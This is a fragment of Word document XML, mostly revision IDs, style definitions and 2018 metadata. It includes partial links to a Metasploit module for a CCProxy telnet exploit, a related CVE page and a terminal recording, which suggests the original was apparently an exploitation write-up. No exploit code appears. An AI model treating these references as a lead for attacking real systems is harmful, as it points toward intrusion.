    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="729E7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2AA"/>
    <w:rsid w:val="00012C3D"/>
    <w:rsid w:val="00030F1A"/>
    <w:rsid w:val="000351DD"/>
    <w:rsid w:val="00037A59"/>
    <w:rsid w:val="00043A07"/>
    <w:rsid w:val="00044B69"/>
    <w:rsid w:val="000559F8"/>
    <w:rsid w:val="00075D91"/>
    <w:rsid w:val="00085C07"/>
    <w:rsid w:val="000A5775"/>
    <w:rsid w:val="000C7367"/>
    <w:rsid w:val="000D5F67"/>
    <w:rsid w:val="000E27D8"/>
    <w:rsid w:val="000F02E8"/>
    <w:rsid w:val="001142FB"/>
    <w:rsid w:val="001209E8"/>
    <w:rsid w:val="0012148C"/>
    <w:rsid w:val="001248C6"/>
    <w:rsid w:val="00124EC0"/>
    <w:rsid w:val="00125061"/>
    <w:rsid w:val="00144041"/>
    <w:rsid w:val="00177C58"/>
    <w:rsid w:val="001A35CA"/>
    <w:rsid w:val="001B3CA5"/>
    <w:rsid w:val="001F4C0F"/>
    <w:rsid w:val="00203400"/>
    <w:rsid w:val="00212837"/>
    <w:rsid w:val="00225292"/>
    <w:rsid w:val="00240E9F"/>
    <w:rsid w:val="002441C4"/>
    <w:rsid w:val="00272455"/>
    <w:rsid w:val="00294556"/>
    <w:rsid w:val="002A3FDF"/>
    <w:rsid w:val="002A744D"/>
    <w:rsid w:val="002E5FE3"/>
    <w:rsid w:val="00311A0E"/>
    <w:rsid w:val="00330B27"/>
    <w:rsid w:val="00343057"/>
    <w:rsid w:val="0035642E"/>
    <w:rsid w:val="00376764"/>
    <w:rsid w:val="003974BC"/>
    <w:rsid w:val="003B74BD"/>
    <w:rsid w:val="003C753C"/>
    <w:rsid w:val="003D0950"/>
    <w:rsid w:val="003E75A5"/>
    <w:rsid w:val="00413322"/>
    <w:rsid w:val="00422304"/>
    <w:rsid w:val="00451CFF"/>
    <w:rsid w:val="00483501"/>
    <w:rsid w:val="00484C6F"/>
    <w:rsid w:val="004B1436"/>
    <w:rsid w:val="004B62A4"/>
    <w:rsid w:val="004D2F26"/>
    <w:rsid w:val="004D4579"/>
    <w:rsid w:val="004E6F5C"/>
    <w:rsid w:val="00514230"/>
    <w:rsid w:val="0052543B"/>
    <w:rsid w:val="00542895"/>
    <w:rsid w:val="005748A3"/>
    <w:rsid w:val="005819C1"/>
    <w:rsid w:val="005B26EC"/>
    <w:rsid w:val="005B7597"/>
    <w:rsid w:val="005C0D1A"/>
    <w:rsid w:val="005F74A1"/>
    <w:rsid w:val="00606DD3"/>
    <w:rsid w:val="00613E58"/>
    <w:rsid w:val="0061517A"/>
    <w:rsid w:val="0063008F"/>
    <w:rsid w:val="0067492D"/>
    <w:rsid w:val="00677158"/>
    <w:rsid w:val="006A63C0"/>
    <w:rsid w:val="006B62BE"/>
    <w:rsid w:val="006C3973"/>
    <w:rsid w:val="006E5738"/>
    <w:rsid w:val="0074728E"/>
    <w:rsid w:val="00756E89"/>
    <w:rsid w:val="00762BA5"/>
    <w:rsid w:val="00765032"/>
    <w:rsid w:val="007E4332"/>
    <w:rsid w:val="00801DEC"/>
    <w:rsid w:val="00821D7B"/>
    <w:rsid w:val="00857D57"/>
    <w:rsid w:val="00862C86"/>
    <w:rsid w:val="008847E4"/>
    <w:rsid w:val="008C4F95"/>
    <w:rsid w:val="008F55E3"/>
    <w:rsid w:val="008F6724"/>
    <w:rsid w:val="009239D6"/>
    <w:rsid w:val="009744F5"/>
    <w:rsid w:val="00975B7F"/>
    <w:rsid w:val="009C30A4"/>
    <w:rsid w:val="009E0FA4"/>
    <w:rsid w:val="009F1330"/>
    <w:rsid w:val="009F68DC"/>
    <w:rsid w:val="00A16BA5"/>
    <w:rsid w:val="00A205FB"/>
    <w:rsid w:val="00A37C3A"/>
    <w:rsid w:val="00A53960"/>
    <w:rsid w:val="00A66DAB"/>
    <w:rsid w:val="00AA1876"/>
    <w:rsid w:val="00AC7EE5"/>
    <w:rsid w:val="00AD340B"/>
    <w:rsid w:val="00AE1957"/>
    <w:rsid w:val="00AF5F24"/>
    <w:rsid w:val="00B102BB"/>
    <w:rsid w:val="00B2283A"/>
    <w:rsid w:val="00B319D8"/>
    <w:rsid w:val="00B34397"/>
    <w:rsid w:val="00B636C2"/>
    <w:rsid w:val="00B93F23"/>
    <w:rsid w:val="00BA00EC"/>
    <w:rsid w:val="00BA5963"/>
    <w:rsid w:val="00BC6F18"/>
    <w:rsid w:val="00BD1C20"/>
    <w:rsid w:val="00BD6014"/>
    <w:rsid w:val="00C11468"/>
    <w:rsid w:val="00C11D63"/>
    <w:rsid w:val="00C35B4A"/>
    <w:rsid w:val="00C44731"/>
    <w:rsid w:val="00C458C4"/>
    <w:rsid w:val="00C630DC"/>
    <w:rsid w:val="00C646FD"/>
    <w:rsid w:val="00C65C5F"/>
    <w:rsid w:val="00C673DE"/>
    <w:rsid w:val="00C71863"/>
    <w:rsid w:val="00C80A4C"/>
    <w:rsid w:val="00CD1F3B"/>
    <w:rsid w:val="00CE0F2C"/>
    <w:rsid w:val="00CE3630"/>
    <w:rsid w:val="00D043F4"/>
    <w:rsid w:val="00D0459C"/>
    <w:rsid w:val="00D1259D"/>
    <w:rsid w:val="00D31FA4"/>
    <w:rsid w:val="00D4779B"/>
    <w:rsid w:val="00D747B1"/>
    <w:rsid w:val="00D76F42"/>
    <w:rsid w:val="00DA5D1E"/>
    <w:rsid w:val="00DD1C5F"/>
    <w:rsid w:val="00DD5E8F"/>
    <w:rsid w:val="00DE1FB4"/>
    <w:rsid w:val="00E21BDF"/>
    <w:rsid w:val="00E22EE6"/>
    <w:rsid w:val="00E33AB4"/>
    <w:rsid w:val="00E414EB"/>
    <w:rsid w:val="00E43055"/>
    <w:rsid w:val="00E541B3"/>
    <w:rsid w:val="00E544A5"/>
    <w:rsid w:val="00E838B0"/>
    <w:rsid w:val="00EC0AB7"/>
    <w:rsid w:val="00EF475C"/>
    <w:rsid w:val="00F172AA"/>
    <w:rsid w:val="00F421CF"/>
    <w:rsid w:val="00F467E9"/>
    <w:rsid w:val="00F550C0"/>
    <w:rsid w:val="00F64F3A"/>
    <w:rsid w:val="00F679FD"/>
    <w:rsid w:val="00F74A9E"/>
    <w:rsid w:val="00F81214"/>
    <w:rsid w:val="00F86453"/>
    <w:rsid w:val="00FB29A5"/>
    <w:rsid w:val="00FC6768"/>
    <w:rsid w:val="00FF2D79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CFAA70-F5C6-41E0-8B1C-40FF8FA9B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3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4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83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3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83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38B0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747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27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7D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7D8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27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E27D8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4A9E"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="line">
    <w:name w:val="line"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000559F8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="underline">
    <w:name w:val="underline"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000559F8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fg-9">
    <w:name w:val="fg-9"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000559F8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fg-12">
    <w:name w:val="fg-12"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00451CFF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00975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8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42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5435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7917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03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8240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895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ciinema.org/a/ZbT6n6VNbfQ9JpNzR2BTDXPUK?t=25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apid7.com/db/modules/exploit/windows/proxy/ccproxy_telnet_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vedetails.com/cve/cve-2004-241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DEE57-9852-4704-821F-F347B8FE9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5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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-23T00:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-25T01:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>